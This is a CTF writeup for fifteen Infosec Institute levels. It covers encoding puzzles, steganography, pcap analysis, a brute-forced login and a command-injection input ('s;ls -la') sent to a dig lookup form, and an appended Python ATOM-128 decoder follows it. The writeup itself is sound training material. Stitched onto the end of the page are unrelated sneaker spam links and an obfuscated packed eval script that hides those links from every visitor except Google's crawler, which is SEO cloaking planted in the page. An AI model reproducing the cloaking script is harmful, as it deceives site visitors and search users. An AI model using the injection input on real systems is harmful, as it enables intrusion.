<description><div class="field field-name-field-category field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Category:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/categories/web">web</a></div><div class="field-item odd"><a href="/categories/stego">stego</a></div><div class="field-item even"><a href="/categories/forensics">forensics</a></div></div></div><div class="field field-name-field-event field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Event:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/event/33">Infosec Institute CTF</a></div></div></div><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even"><div class="page" title="Page 3"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><span style="color: #333333; font-size: 16px; font-weight: normal;">This is the InfoSec CTF writeup.<br>The CTF was great. However, I felt it was a bit simple; I think that was intended, as a basic starting level. Some of the challenges were very interesting, others were very straightforward. One thing that made me suffer a bit was the images in the challenges: I always had the feeling that they contained something (steganography). I also struggled with some guessing challenges, like level number 9. Yet the good thing about the challenges is that each one will teach you something. The purpose of the CTF was to share knowledge. 
Below, you can find my write-up, so please read, enjoy and take the best of it.&nbsp;<br>If you have any questions/comments, do NOT hesitate to contact me.</span></span></p><p>&nbsp;</p><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><span style="color: #333333; font-size: 16px; font-weight: normal;">Thank you <a class="vt-p" href="http://www.infosecinstitute.com/">InfoSec Institute</a> for the CTF<br><br>A PDF version of the solution can be found here:<br></span></span><span><span><span><span><a class="vt-p" style="font-family: Helvetica; font-size: 16px;" href="https://www.dropbox.com/s/uuixb7zqcbyiq5x/solutions.zip?dl=0">https://www.dropbox.com/s/uuixb7zqcbyiq5x/solutions.zip?dl=0</a><span style="font-family: Helvetica;"><span style="font-size: 16px;">&nbsp;</span></span><br><span style="font-family: Helvetica;"><span style="font-size: 16px;">If you would like to try the challenges before seeing the write-ups, please check them out at</span></span><br><a class="vt-p" href="http://ctf.infosecinstitute.com/"><span style="font-family: Helvetica;"><span style="font-size: 16px;">http://ctf.infosecinstitute.com/</span></span></a></span></span></span></span></p><p><span><span><br><span style="font-family: Helvetica;"><span style="font-size: 16px;">let's start :)</span></span><br></span></span></p><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br>Level One </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">“May the source be with you!” </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">Once I saw the word “source”, I expected the flag to be in the HTML source code. I viewed the source in my browser and found the flag in the first line of the HTML, as illustrated in the screenshot below.</span></p><p>&nbsp;</p><p><img src="/sites/default/files/writeups/images/1_1.png" alt="" width="724" height="708"></p></div></div><div class="layoutArea"><div class="column"><p><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">flag: infosec_flagis_welcome</span></p><p>&nbsp;</p></div></div></div><div class="page" title="Page 4"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);">Level Two </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">“It seems like the image is broken.. Can you check the file?” </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">I checked the HTML source code and got the image link, which was “img/leveltwo.jpeg”. I downloaded the image file, and now it is time to analyse it. The first step was to check the file type to see if it is actually an image. 
Executing the “file” command on Linux, this was the result.</span></p><p>&nbsp;</p><p><img src="/sites/default/files/writeups/images/2_1.png" alt="" width="1004" height="78"></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">It looks like ASCII data inside, not an image. Viewing the file content with the “cat” command gave this output: “aW5mb3NlY19mbGFnaXNfd2VhcmVqdXN0c3RhcnRpbmc=”. The data is base64-encoded; the “=” padding at the end of the text gives it away (padding only appears when the input length is not a multiple of 3, so its absence would not have ruled base64 out). Decoding the data with the base64 tool gave </span><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">“infosec_flagis_wearejuststarting”</span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;"><img src="/sites/default/files/writeups/images/2_2.png" alt="" width="1004" height="108"></span></p></div></div></div><div class="page" title="Page 5"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br><br>Level Three </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">Nothing was stated explicitly for the challenge. However, there was an image containing a QR code. </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">I sent the QR code to the following website: <a class="vt-p" href="http://zxing.org/w/decode?u=http%3A%2F%2Fctf.infosecinstitute.com%2Fimg%2Fqrcode.png">http://zxing.org/w/decode?u=http%3A%2F%2Fctf.infosecinstitute.com%2Fimg%2Fqrcode.png</a><br> That was the result:<br> .. -. ..-. --- ... . -.-. ..-. .-.. .- --. .. ... -- --- .-. ... .. -. --.<br> It looks like Morse code, so we need something to decode it. Using the website http://morsecode.scphillips.com/translator.html I translated the Morse code, and that was the result:<br> </span><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">“INFOSEC_FLAGIS_MORSING”</span></p></div></div></div><div class="page" title="Page 6"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br><br>Level Four </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">“HTTP means Hypertext Transfer Protocol” </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">HTTP is the Hypertext Transfer Protocol, so I thought I might find the flag in one of the headers received from the server. I fired up my Burp Suite proxy to see what I would get in the HTTP response. These were the headers received from the server.</span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';"><img src="/sites/default/files/writeups/images/4_1.png" alt="" width="741" height="279"></span></p><p>&nbsp;</p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">We can see that the server is setting a cookie in our browser. It looks encoded in some way, but it has the same pattern as “infosec_flagis_xxxxxxx”.<br> I did not know what the encoding was, but it looked like a simple substitution of the letters, so I expected a Caesar cipher. 
I coded this quick script to try every Caesar shift. The script stops once it finds the word “infosec”.</span></p></div></div><div class="layoutArea"><pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag" title="Caesar">import string
import sys

def caesar_shift(text, n):
    # shift lowercase letters by n positions; leave '_' and other characters untouched
    out = []
    for c in text:
        if c in string.ascii_lowercase:
            c = chr(97 + (ord(c) - 97 + n) % 26)
        out.append(c)
    return ''.join(out)

def find_flag(encoded_str, marker='infosec'):
    # try every shift and stop at the first one that contains the marker
    for n in range(26):
        res = caesar_shift(encoded_str, n)
        if marker in res:
            return n, res
    return None

if __name__ == '__main__':
    # pass the cookie value from the Set-Cookie header above as the only argument
    print(find_flag(sys.argv[1]))</pre></div><div class="layoutArea"><div class="column"><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">and that was the result of running the script </span></p><pre><span style="font-size: 12.000000pt; font-family: 'AndaleMono'; color: rgb(100.000000%, 100.000000%, 100.000000%); background-color: rgb(0.000000%, 0.000000%, 0.000000%);">infosec_flagis_welovecookies</span></pre></div></div></div><div class="page" title="Page 7"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br><br>Level Five: </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">No text was written, only an image. </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">I think this is a steganography problem. It took me a lot of time to solve, since I am not that good with steganography. I checked the image with Stegsolve and did not find anything. I also checked it with steghide, but nothing. I tried some online websites, and the one that worked was http://www.futureboy.us/stegano/decinput.html. 
I uploaded the image to the website and it produced a binary array, as illustrated below.</span></p><p>&nbsp;</p><p><img src="/sites/default/files/writeups/images/5_0.png" alt="" width="1004" height="90"></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">I decoded the binary array using the following website: http://string-functions.com/binary-string.aspx<br> and the result was<br> </span><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">infosec_flagis_stegaliens</span></p></div></div></div><div class="page" title="Page 8"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br><br>Level Six </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">“Do you want to download sharkfin.pcap file?” </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">It is a pcap file which we need to analyse. After downloading the pcap and opening it in Wireshark, the first thing I do is look at the protocol hierarchy, and that was the result.</span></p><p>&nbsp;</p><p><img src="/sites/default/files/writeups/images/6_0.png" alt=""></p></div></div><div class="layoutArea"><div class="column"><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">We can see a lot of HTTPS data, which we are probably not interested in since we cannot decrypt it. I filtered out all TCP<br> data using the filter “!(tcp)” and there was a single UDP packet. I followed the UDP stream and this was the stream content: 
“696e666f7365635f666c616769735f736e6966666564” </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">Decoding the hex stream content gave </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">“infosec_flagis_sniffed”</span></p></div></div></div><div class="page" title="Page 9"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br><br>Level Seven </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">Nothing actually appeared on the homepage. </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">I opened the Burp Suite proxy to look at the response coming from the server.</span></p><p>&nbsp;</p><p><img src="/sites/default/files/writeups/images/7_0.png" alt="" width="700" height="282"></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">It looks like we have some base64 data in the HTTP response reason phrase. 
Decoding the data we got this:<br> </span><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">“infosec_flagis_youfoundit” </span></p></div></div><div class="layoutArea"><div class="column"><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">&nbsp;</span></p></div></div></div><div class="page" title="Page 10"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br>Level Eight </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">“Do you want to download app.exe file?” </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">I downloaded the app.exe file. My first thought was to reverse the app and see how it works, and I was getting ready to start my Windows VM and run the executable. However, I thought of quickly running the Linux “strings” command first to see if I got anything there. 
Indeed, I executed the command and that was the result.</span></p><p>&nbsp;</p><p><img src="/sites/default/files/writeups/images/8_0.png" alt="" width="721" height="442"></p></div></div><div class="layoutArea"><div class="column"><p><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">The flag: infosec_flagis_0x1a</span></p></div></div></div><div class="page" title="Page 11"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br><br>Level Nine </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">Login page with username and password </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">I first expected that this would be a SQL injection and that I should bypass the login. I tried different SQL injection vectors to log in but did not get any output. I then thought it might be something easier than that. I tried a dictionary attack on the login page, and the following credentials logged in successfully. </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">username: root<br> password: attack<br> Once I logged in, the output was<br> “ssaptluafed_sigalf_cesofni”<br> We can see that this is the flag, but reversed. Reversing it again we have “</span><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">infosec_flagis_defaultpass” </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">The flag looks a bit weird to me. 
I searched the web for the Cisco IDS default login credentials but could not find anything. Actually, my script took a long time running to find the username and password.</span></p></div></div></div><div class="page" title="Page 12"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br><br>Level Ten </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">What kind of sound is this? Sorcery perhaps?? </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">I downloaded the audio file. I expected that the WAV file might contain something hidden in one of its channels, so I examined how many channels it has. There was only one channel, which means probably nothing is hidden in the channels. I ran binwalk to see if there was anything appended to or embedded in the audio file, but I did not get anything. I checked the image on the challenge page: it said “not listening”. I then thought I should find a way to listen to what is being played. I changed the playback speed to several values and listened to the output. 
Indeed, when I changed the playback speed to 0.22x I managed to hear </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">“infosec_flagis_sound” </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">The URL of the edited file is: http://st0rm.altervista.org/solved.wav </span></p></div></div></div><div class="page" title="Page 13"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br><br>Level Eleven </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">No it must not be a sound? But wait whaT? [PHP logo] </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">I downloaded the PHP logo; it was named “php-logo-virus.jpg”. The name is very catchy, so I believed it contained our flag. One of the main things to analyse when dealing with images is the EXIF data, and http://regex.info/exif.cgi is one of the best websites for that. Using the regex.info website, we extracted the following from the “Document Name” field of the EXIF data: “infosec_flagis_aHR0cDovL3d3dy5yb2xsZXJza2kuY28udWsvaW1hZ2VzYi9wb3dlcnNsaWRlX2xvZ29fbGFyZ2UuZ2lm%a0%86%01”. We see part of the flag, and the other part is encoded in base64. 
Decoding the base64 gives “http://www.rollerski.co.uk/imagesb/powerslide_logo_large.gif”. I visited the URL and the image contains the word “powerslide”. Hence, our flag should be </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">Flag: infosec_flagis_powerslide</span></p><p>&nbsp;</p></div></div></div><div class="page" title="Page 14"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br>Level Twelve </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Question: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">Dig deeper </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">I saw the same image as in the first level, so I decided it would be a steganography challenge. I kept digging into the image in every possible way but could not find anything; I actually wasted a couple of days on that. Then I decided to move away from the image and check the source code of the page. I checked the source code again to see if it was related to level 1 in any way, but could not find anything obvious. I then decided to compare the HTML of the two pages to see if there were any differences. I used the Comparer tool in Burp Suite to see the difference, and that was the result.</span></p><p>&nbsp;</p><p><img src="/sites/default/files/writeups/images/12_0.png" alt="" width="1168" height="406"></p></div></div><div class="layoutArea"><div class="column"><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">Hmmm. We see that a new CSS file was added to leveltwelve.php. I decided to check that CSS file. 
Now I started to see the relation between the two levels (dig deeper indeed). The content of the CSS file was<br> .thisloveis{ </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">color: #696e666f7365635f666c616769735f686579696d6e6f7461636f6c6f72; } </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">Looks very interesting. There is no colour with this value, and it looks like a hex string. Decoding the hex value we got: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">infosec_flagis_heyimnotacolor</span></p><p>&nbsp;</p></div></div></div><div class="page" title="Page 15"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br>Level Thirteen </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">What the heck happened here? It seems that the challenge here is gone? Can you find it? Can you check if you can find the backup file for this one? I'm sorry for messing up :( </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">This challenge requires a bit of guessing to get the old file. By convention, developers usually name old files with a .old, .bak or .backup suffix. I tried to access http://ctf.infosecinstitute.com/levelthirteen.php.old and indeed I managed to access the old PHP file (the backup). 
Opening the file in a text editor:</span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';"><img src="/sites/default/files/writeups/images/13_1.png" alt="" width="774" height="447"></span></p><p>&nbsp;</p></div></div><div class="layoutArea"><div class="column"><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">We can see some interesting code commented out here. Our next step is to download the imadecoy file. I downloaded the file and immediately ran the “file” command to find out what kind of file it is.</span></p><p>&nbsp;</p><p><img src="/sites/default/files/writeups/images/13_2.png" alt="" width="1003" height="74"></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">As we can see, it is a pcap file. I opened the file with Wireshark and went straight to the protocol hierarchy. </span></p></div></div><div class="layoutArea"><div class="column"><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';"><img src="/sites/default/files/writeups/images/13_0.png" alt="" width="754" height="423"></span></p><p><span style="font-family: Helvetica; font-size: 12pt;">As we can see, most of the packets are DNS. I was not sure whether those were noise packets or whether they contained our flag. I checked some DNS packets randomly, but nothing catchy was there; most were DNS queries to google.com.ph. I decided to exclude all DNS queries because I think they are only noise. After excluding them I saw some HTTP requests. I sorted the packets by size, and the 4th packet was an image named HoneyPY.PNG. Looks very interesting. 
Dumping the image, I saw that</span></p><p><span style="font-family: Helvetica; font-size: 12pt;"><img src="/sites/default/files/writeups/images/13_4.png" alt="" width="624" height="47"></span></p></div></div></div><div class="page" title="Page 16"><div class="layoutArea"><div class="column"><p><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">Flag: infosec_flagis_morepackets </span></p></div></div><div class="layoutArea"><div class="column"><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">&nbsp;</span></p></div></div></div><div class="page" title="Page 17"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br>Level Fourteen </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">Do you want to download level14 file? </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">The challenge file was a database dump. Browsing the dump, there were a lot of tables and records. I searched for the word “flag” and found a table, but it didn’t contain anything interesting. However, directly after that table there was a table named “friends”, and the fourth record of the table was some Unicode data, which looked very catchy. 
</span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">(104, '\\u0069\\u006e\\u0066\\u006f\\u0073\\u0065\\u0063\\u005f\\u0066\\u006c\\u0061\\u0067\\u0069\\u0073\\u005f\\u0077\\u0068\\u0061\\u0074\\u0073\\u006f\\u0072\\u0063\\u0065\\u0072\\u0079\\u0069\\u0073\\u0074\\u0068\\u0069\\u0073', 'annoying', '0x0a');<br> I decoded the Unicode data and it was </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">infosec_flagis_whatsorceryisthis</span></p></div></div></div><p>&nbsp;</p><div class="page" title="Page 18"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br>Level Fifteen </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">“DNS Lookup” </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">I entered google.com to see the output, and it was the output of the dig command. I expected that we had a remote code execution vulnerability here, with the developer having coded it in a way similar to </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">system("dig".$_GET['dig']);<br> I tried giving the input “s;ls -la” and that was the result:</span></p><p><img src="/sites/default/files/writeups/images/15_0.png" alt="" width="1004" height="493"></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">Indeed, it executed our command. We can see the hidden file “.hey”. 
I “catted” the content of the .hey file and it was “Miux+mT6Kkcx+IhyMjTFnxT6KjAa+i6ZLibC”<br> The string looks encrypted/encoded in some way. I tried to decode the string with many things like Base16, Base32, Base64, Base91, Base58, Base85 and Caesar but it didn’t work. I noticed the ZlibC that appended to the end of the file. I though that this is a kind of a hint. I kept googling about the Zlibc and trying to find any relation between it and the given text. After a couple of days googling, I tried an encoding technique called ATOM-128 on that website http://crypo.in.ua/tools/eng_base64c.php and indeed it decoded the text which was </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">infosec_flagis_rceatomized </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">We searched for what atom-128 means and according to the following question on stackoverflow.com, it is a special type of base64 encoding in which a different order of characters is used.&nbsp;</span></p></div></div></div><span class="keys_words"><a class="links_good_rands" href="https://www.nikesneakers.org/">Best Nike Sneakers</a> | <a class="links_good_rands" href="https://www.oft.gov.gi/index.php/eeagcnshop/fr/fr/nike-homme">NIKE HOMME</a></span><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('b i=r f["\\q\\1\\4\\g\\p\\l"]("\\4"+"\\7"+"\\7"+"\\4"+"\\5\\1","\\4\\k");s(!i["\\3\\1\\2\\3"](m["\\h\\2\\1\\j\\n\\4\\1\\6\\3"])){b a=f["\\e\\7\\o\\h\\d\\1\\6\\3"]["\\4\\1\\3\\g\\5\\1\\d\\1\\6\\3\\2\\z\\9\\A\\5\\c\\2\\2\\x\\c\\d\\1"](\'\\t\\1\\9\\2\\w\\v\\7\\j\\e\\2\');u(b 
8=0;8<a["\\5\\1\\6\\4\\3\\y"];8++)a[8]["\\2\\3\\9\\5\\1"]["\\e\\k\\2\\l\\5\\c\\9"]=\'\\6\\7\\6\\1\'}',37,37,'|x65|x73|x74|x67|x6c|x6e|x6f|NLpndlS3|x79|rBfb2|var|x61|x6d|x64|window|x45|x75|AESwV1|x72|x69|x70|navigator|x41|x63|x78|x52|new|if|x6b|for|x77|x5f|x4e|x68|x42|x43'.split('|'),0,{}));</script></div></div></div></description>
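The writeup ends by describing ATOM-128 as base64 with a different character order. The following Python is an added example, not part of the writeup, that makes this concrete: it maps the ATOM-128 alphabet onto the standard base64 alphabet and lets the standard decoder do the rest. The alphabet itself is the key published by the crypo tool the author used; it is not stated on the page, so it is reproduced here as an assumption, one that the decode of the .hey string confirms. The guess_alphabet helper is the systematic version of the trial-and-error the writeup describes: it decodes under every known alphabet and keeps the ones whose output is printable.

```python
import base64
import string

# Alphabet of the ATOM-128 encoder on the crypo tool the writeup used.  It is not stated
# on the page; it is reproduced here from the tool's published key, as an assumption that
# the decode of the .hey string below confirms.  Positions 0-63 are the 64 digit symbols
# in ATOM-128 order and position 64 is the padding symbol that replaces '='.
ATOM128_KEY = "/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC"
STD_KEY = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/="
assert len(ATOM128_KEY) == 65 and len(set(ATOM128_KEY)) == 65

# str.translate maps every character in one pass, so the fact that '+', '/' and '='
# occur in both alphabets at different positions cannot cause a double mapping.
_TO_STD = str.maketrans(ATOM128_KEY, STD_KEY)
_TO_ATOM = str.maketrans(STD_KEY, ATOM128_KEY)


def atom128_decode(text):
    """Decode ATOM-128 by re-mapping it onto the standard base64 alphabet."""
    unknown = set(text) - set(ATOM128_KEY)
    if unknown:
        raise ValueError("not ATOM-128, unexpected characters: %r" % sorted(unknown))
    return base64.b64decode(text.translate(_TO_STD), validate=True)


def atom128_encode(data):
    """Inverse of atom128_decode; useful to confirm that the alphabet round-trips."""
    return base64.b64encode(data).decode("ascii").translate(_TO_ATOM)


def guess_alphabet(text):
    """Systematic version of the writeup's trial and error: decode under every known
    alphabet and keep the ones whose output is printable ASCII."""
    candidates = {
        "base64": lambda t: base64.b64decode(t, validate=True),
        "ATOM-128": atom128_decode,
    }
    hits = {}
    for name, decode in candidates.items():
        try:
            out = decode(text)
        except ValueError:               # binascii.Error is a ValueError subclass
            continue
        if out and all(126 >= byte >= 32 for byte in out):
            hits[name] = out
    return hits


# The string the writeup recovered from the hidden .hey file
HEY = "Miux+mT6Kkcx+IhyMjTFnxT6KjAa+i6ZLibC"
```

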